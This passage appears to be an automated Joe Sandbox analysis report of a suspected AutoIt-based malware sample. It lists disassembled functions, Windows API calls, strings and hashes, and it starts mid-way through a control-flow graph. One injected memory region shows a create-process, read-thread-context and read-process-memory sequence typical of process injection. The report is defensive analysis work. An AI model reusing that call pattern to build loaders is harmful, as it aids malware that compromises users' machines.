1018->1021 1019->1021 1021->997 1024 1402841-1402870 call 14037f0 1023->1024 1025 1402872-1402886 call 1403600 1023->1025 1024->1023 1031 1402888 1025->1031 1032 140288a-140288e 1025->1032 1031->991 1033 1402890-1402894 FindCloseChangeNotification 1032->1033 1034 140289a-140289e 1032->1034 1033->1034 1035 14028a0-14028ab VirtualFree 1034->1035 1036 14028ae-14028b7 1034->1036 1035->1036 1036->986 1036->991
              APIs
              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01402761
              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01402987
              Memory Dump Source
              • Source File: 00000000.00000002.2016453985.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1400000_F2024-202202.jbxd
              Similarity
              • API ID: CreateFileFreeVirtual
              • String ID:
              • API String ID: 204039940-0
              • Opcode ID: d148fe5d8863b416e5057870d6e1995944efe260b2a1982c94e468d18abf04d1
              • Instruction ID: cae01be14ffcfab33f5501579136ca38933d915af6f6a7a7463d69fed52d0996
              • Opcode Fuzzy Hash: d148fe5d8863b416e5057870d6e1995944efe260b2a1982c94e468d18abf04d1
              • Instruction Fuzzy Hash: CFA12975E00209EBDB15CFA5C898FEEBBB5BF48304F20816AE501BB2D1D7B59A41CB54
              Function 001839E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1114 1839e7-183a57 CreateWindowExW * 2 ShowWindow * 2
              APIs
              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00183A15
              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00183A36
              • ShowWindow.USER32(00000000,?,?), ref: 00183A4A
              • ShowWindow.USER32(00000000,?,?), ref: 00183A53
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$CreateShow
              • String ID: AutoIt v3$edit
              • API String ID: 1584632944-3779509399
              • Opcode ID: e873e85b63087902b3e0d8fd84ef526eef2fbf2055bb6178ad2fd84f35fab916
              • Instruction ID: 3444f7355d8a2bef0dd61d2ed3aa67cc83d99347d2a5b3283a7f16131bed4463
              • Opcode Fuzzy Hash: e873e85b63087902b3e0d8fd84ef526eef2fbf2055bb6178ad2fd84f35fab916
              • Instruction Fuzzy Hash: 45F03A746802907EEB7197277C0CE273E7DE7C7F50F00002ABD00A21B1C2E60810CAB2
              Function 01402410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162fileCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1115 1402410-140258a call 1400000 call 1402300 CreateFileW 1122 1402591-14025a1 1115->1122 1123 140258c 1115->1123 1126 14025a3 1122->1126 1127 14025a8-14025c2 VirtualAlloc 1122->1127 1124 1402641-1402646 1123->1124 1126->1124 1128 14025c4 1127->1128 1129 14025c6-14025dd ReadFile 1127->1129 1128->1124 1130 14025e1-140261b call 1402340 call 1401300 1129->1130 1131 14025df 1129->1131 1136 1402637-140263f ExitProcess 1130->1136 1137 140261d-1402632 call 1402390 1130->1137 1131->1124 1136->1124 1137->1136
              APIs
                • Part of subcall function 01402300: Sleep.KERNELBASE(000001F4), ref: 01402311
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0140257D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016453985.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1400000_F2024-202202.jbxd
              Similarity
              • API ID: CreateFileSleep
              • String ID: EK9DHSXQI8X8LT2ZM8VEF0RW4N
              • API String ID: 2694422964-1628879581
              • Opcode ID: 28baef2b834099c0a3d3082542bf1d2f1ae1fc8fdce73ce96d69836baeca99d0
              • Instruction ID: ec8aa38c5e04c318b789d2d8d966a416d5a96af41b215baca8572e1d743c34de
              • Opcode Fuzzy Hash: 28baef2b834099c0a3d3082542bf1d2f1ae1fc8fdce73ce96d69836baeca99d0
              • Instruction Fuzzy Hash: 7F619530D04288DAEF12DBB4C858BDFBB74AF19304F004199E649BB2D0D7BA5B45CB66
              Function 0018410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1139 18410d-184123 1140 184129-18413e call 187b76 1139->1140 1141 184200-184204 1139->1141 1144 1bd5dd-1bd5ec LoadStringW 1140->1144 1145 184144-184164 call 187d2c 1140->1145 1148 1bd5f7-1bd60f call 187c8e call 187143 1144->1148 1145->1148 1149 18416a-18416e 1145->1149 1159 18417e-1841fb call 1a3020 call 18463e call 1a2ffc Shell_NotifyIconW call 185a64 1148->1159 1160 1bd615-1bd633 call 187e0b call 187143 call 187e0b 1148->1160 1151 184174-184179 call 187c8e 1149->1151 1152 184205-18420e call 1881a7 1149->1152 1151->1159 1152->1159 1159->1141 1160->1159
              APIs
              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001BD5EC
                • Part of subcall function 00187D2C: _memmove.LIBCMT ref: 00187D66
              • _memset.LIBCMT ref: 0018418D
              • _wcscpy.LIBCMT ref: 001841E1
              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001841F1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
              • String ID: Line:
              • API String ID: 3942752672-1585850449
              • Opcode ID: d8c9799ac86a62febc6a6a3e1e8ac80acc5a67e81ead2e480ed00e0af1457600
              • Instruction ID: f1a017e4c18207aa9a11325b16b85b0c5b9a9cd114ea1927859078974c950738
              • Opcode Fuzzy Hash: d8c9799ac86a62febc6a6a3e1e8ac80acc5a67e81ead2e480ed00e0af1457600
              • Instruction Fuzzy Hash: 363170714083056BD725FB60EC49BDB77E8AB66310F20461AF595920E1EFB4A748CB93
              Function 001A564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
              • String ID:
              • API String ID: 1559183368-0
              • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
              • Instruction ID: 86afe730399fbcae5c30d49e76b712006f0147a48b82dd49b975fd753c2498e1
              • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
              • Instruction Fuzzy Hash: 7751DA79A08B05DFDB248FF9C88066E77B3AF52320F648729F839A61D0D7709D548B40
              Function 001869CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00184F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,002462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00184F6F
              • _free.LIBCMT ref: 001BE68C
              • _free.LIBCMT ref: 001BE6D3
                • Part of subcall function 00186BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00186D0D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _free$CurrentDirectoryLibraryLoad
              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
              • API String ID: 2861923089-1757145024
              • Opcode ID: e168387df32ee7b125f640b69042502d1f1b81bf9431cade8298273a9e90a397
              • Instruction ID: 98b7edd0555dc5238f71942eea813c9c6e6da6e73b8a6c03a0b58fefffd4548d
              • Opcode Fuzzy Hash: e168387df32ee7b125f640b69042502d1f1b81bf9431cade8298273a9e90a397
              • Instruction Fuzzy Hash: DF915E71910219AFCF18EFA4CC919EDB7B5FF29314F14446AF816AB291EB309A15CF60
              Function 001835B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
              Download Yara Rule
              APIs
              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,001835A1,SwapMouseButtons,00000004,?), ref: 001835D4
              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,001835A1,SwapMouseButtons,00000004,?,?,?,?,00182754), ref: 001835F5
              • RegCloseKey.KERNELBASE(00000000,?,?,001835A1,SwapMouseButtons,00000004,?,?,?,?,00182754), ref: 00183617
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CloseOpenQueryValue
              • String ID: Control Panel\Mouse
              • API String ID: 3677997916-824357125
              • Opcode ID: 8ffa67a34e02a9881f36f6facbf5a955c586572cdcb3f21ae5a9ab84c02ee4cb
              • Instruction ID: e01e1c98810a191f7c5b215d204f8146ea25dccff4a05ad26a7a93f62773701f
              • Opcode Fuzzy Hash: 8ffa67a34e02a9881f36f6facbf5a955c586572cdcb3f21ae5a9ab84c02ee4cb
              • Instruction Fuzzy Hash: 59115771610208BFDB209F68EC84EBEBBB9EF04B40F258469F805D7214E3719F409BA0
              Function 01401300 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
              Download Yara Rule
              APIs
              • CreateProcessW.KERNELBASE(?,00000000), ref: 01401ABB
              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01401B51
              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01401B73
              Memory Dump Source
              • Source File: 00000000.00000002.2016453985.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1400000_F2024-202202.jbxd
              Similarity
              • API ID: Process$ContextCreateMemoryReadThreadWow64
              • String ID:
              • API String ID: 2438371351-0
              • Opcode ID: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
              • Instruction ID: 1a97b814b5af261bfe9d9668263babeec90bdd0dee53eb11081bfc405aac038c
              • Opcode Fuzzy Hash: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
              • Instruction Fuzzy Hash: 3262F930A142589BEB25CFA5C850BDEB772EF58700F1091A9D20DEB3E0E7759E81CB59
              Function 001E97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00185045: _fseek.LIBCMT ref: 0018505D
                • Part of subcall function 001E99BE: _wcscmp.LIBCMT ref: 001E9AAE
                • Part of subcall function 001E99BE: _wcscmp.LIBCMT ref: 001E9AC1
              • _free.LIBCMT ref: 001E992C
              • _free.LIBCMT ref: 001E9933
              • _free.LIBCMT ref: 001E999E
                • Part of subcall function 001A2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,001A9C64), ref: 001A2FA9
                • Part of subcall function 001A2F95: GetLastError.KERNEL32(00000000,?,001A9C64), ref: 001A2FBB
              • _free.LIBCMT ref: 001E99A6
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
              • String ID:
              • API String ID: 1552873950-0
              • Opcode ID: d9ae0c5d453641694606f69828c3ed73b5fd5779769f00272cc49afe01aba135
              • Instruction ID: ed7ab2771e6fac73aa8094bde0b1f74a6f1edc34f7d2f86d60fbc0be4716181e
              • Opcode Fuzzy Hash: d9ae0c5d453641694606f69828c3ed73b5fd5779769f00272cc49afe01aba135
              • Instruction Fuzzy Hash: D35170B1D04658AFDF249F65CC81A9EBBBAEF48304F1004AEF609A7241DB715E80CF58
              Function 001A493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
              • String ID:
              • API String ID: 2782032738-0
              • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
              • Instruction ID: 2ad5d2048ecb61dbc7c1b40ab55cacaf9ac5bea50d163f11b49a17fae5f6f692
              • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
              • Instruction Fuzzy Hash: A041D47D6007069FDF28CEA9C8809AF77A6EFCA364B24813DE856C7640E7B0DD508B44
              Function 00184DD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memmove
              • String ID: AU3!P/!$EA06
              • API String ID: 4104443479-2528700987
              • Opcode ID: c4107b2b7f102be84109bcc56edb8fc9644c9e0704b5ae50612e8abb02016255
              • Instruction ID: 910dbe3089e9156628afc4a0a25395985c2edf992832e40ad13075980f5928d9
              • Opcode Fuzzy Hash: c4107b2b7f102be84109bcc56edb8fc9644c9e0704b5ae50612e8abb02016255
              • Instruction Fuzzy Hash: 5B416E21A046556BDF25BB6488517BE7FA6EB15300F294065FC829B282DF294F408FA1
              Function 001873E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 001BEE62
              • GetOpenFileNameW.COMDLG32(?), ref: 001BEEAC
                • Part of subcall function 001848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001848A1,?,?,001837C0,?), ref: 001848CE
                • Part of subcall function 001A09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001A09F4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Name$Path$FileFullLongOpen_memset
              • String ID: X
              • API String ID: 3777226403-3081909835
              • Opcode ID: 2bdc38cb4a9e4c14d142a00dd00dc6e7833dfa541045baacb1fb694d63f78c14
              • Instruction ID: 68ff8811bab552f9b2c1f3440dd13bca6805df993782a1b661a62df039dbde5f
              • Opcode Fuzzy Hash: 2bdc38cb4a9e4c14d142a00dd00dc6e7833dfa541045baacb1fb694d63f78c14
              • Instruction Fuzzy Hash: 0821C670A102589BCF11EF94C845BEE7BF99F59314F104019E408E7281DBF89A898FA1
              Function 001E901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __fread_nolock_memmove
              • String ID: EA06
              • API String ID: 1988441806-3962188686
              • Opcode ID: 55fcf971e4c7e85b5081864dd176f3abf88e7ec267a5e1c21da8e18a9c4b5f95
              • Instruction ID: 63d40cbb7214270dc68c6ca5611c73334057903aa295d2819e45b2d9efba5215
              • Opcode Fuzzy Hash: 55fcf971e4c7e85b5081864dd176f3abf88e7ec267a5e1c21da8e18a9c4b5f95
              • Instruction Fuzzy Hash: 5101B9719046587EDB28C7A9C856EFE7BFC9B15301F00419AF552D2181E679A6148760
              Function 001E9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
              Download Yara Rule
              APIs
              • GetTempPathW.KERNEL32(00000104,?), ref: 001E9B82
              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 001E9B99
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Temp$FileNamePath
              • String ID: aut
              • API String ID: 3285503233-3010740371
              • Opcode ID: dfe772faf56694a35284c6bc747065f63a17188b6bdb4624d5974701a1b57353
              • Instruction ID: c3b398ddcd056f95c415f441d46ca607188fb92111c16b2214cb448138b2354a
              • Opcode Fuzzy Hash: dfe772faf56694a35284c6bc747065f63a17188b6bdb4624d5974701a1b57353
              • Instruction Fuzzy Hash: 8BD05E7958030DAFDB609B90EC0EF9A772CE704700F0042B1BF94910A2DEB065A88B91
              Function 001FCDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 803fe25308329cea950372fcb9caf0d3f761a65d27cf6d4e64391f26d6b38eeb
              • Instruction ID: 7b6ea43545d1ebd9c94e2f4f97670f21df1a3140053aa8afa310fe67eac5ed23
              • Opcode Fuzzy Hash: 803fe25308329cea950372fcb9caf0d3f761a65d27cf6d4e64391f26d6b38eeb
              • Instruction Fuzzy Hash: E7F15970A083059FC714DF28C484A6ABBE5FF88314F54896EF99A9B351DB31E945CF82
              Function 001843DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 00184401
              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 001844A6
              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 001844C3
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: IconNotifyShell_$_memset
              • String ID:
              • API String ID: 1505330794-0
              • Opcode ID: 7f2012f8aaa3919424cecb198f4067b02e831225e16f183795a0ccada23f9d9a
              • Instruction ID: 20a467aa1f30cb3ededab6d552a6c657cd065b934a1576940592ec771ac5813d
              • Opcode Fuzzy Hash: 7f2012f8aaa3919424cecb198f4067b02e831225e16f183795a0ccada23f9d9a
              • Instruction Fuzzy Hash: 3C3175B45057019FD720EF24E888797BBF4FB59304F00092EF99A83251DBB56A44CF52
              Function 001A594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • __FF_MSGBANNER.LIBCMT ref: 001A5963
                • Part of subcall function 001AA3AB: __NMSG_WRITE.LIBCMT ref: 001AA3D2
                • Part of subcall function 001AA3AB: __NMSG_WRITE.LIBCMT ref: 001AA3DC
              • __NMSG_WRITE.LIBCMT ref: 001A596A
                • Part of subcall function 001AA408: GetModuleFileNameW.KERNEL32(00000000,002443BA,00000104,?,00000001,00000000), ref: 001AA49A
                • Part of subcall function 001AA408: ___crtMessageBoxW.LIBCMT ref: 001AA548
                • Part of subcall function 001A32DF: ___crtCorExitProcess.LIBCMT ref: 001A32E5
                • Part of subcall function 001A32DF: ExitProcess.KERNEL32 ref: 001A32EE
                • Part of subcall function 001A8D68: __getptd_noexit.LIBCMT ref: 001A8D68
              • RtlAllocateHeap.NTDLL(01410000,00000000,00000001,00000000,?,?,?,001A1013,?), ref: 001A598F
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
              • String ID:
              • API String ID: 1372826849-0
              • Opcode ID: 320a6c4eeb3c328ebc157af4880647fd3d127f84aa1130da593a7b19ae505466
              • Instruction ID: 1681adbf14b7202481a0c0dd72f5c187a00eccaca319c6a0d0ff81ea1e9174af
              • Opcode Fuzzy Hash: 320a6c4eeb3c328ebc157af4880647fd3d127f84aa1130da593a7b19ae505466
              • Instruction Fuzzy Hash: AD01D23D248B11DEE7257B64E846B6F725A9F63778F51002AF500AE181DB709D018660
              Function 001E9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,001E97D2,?,?,?,?,?,00000004), ref: 001E9B45
              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,001E97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 001E9B5B
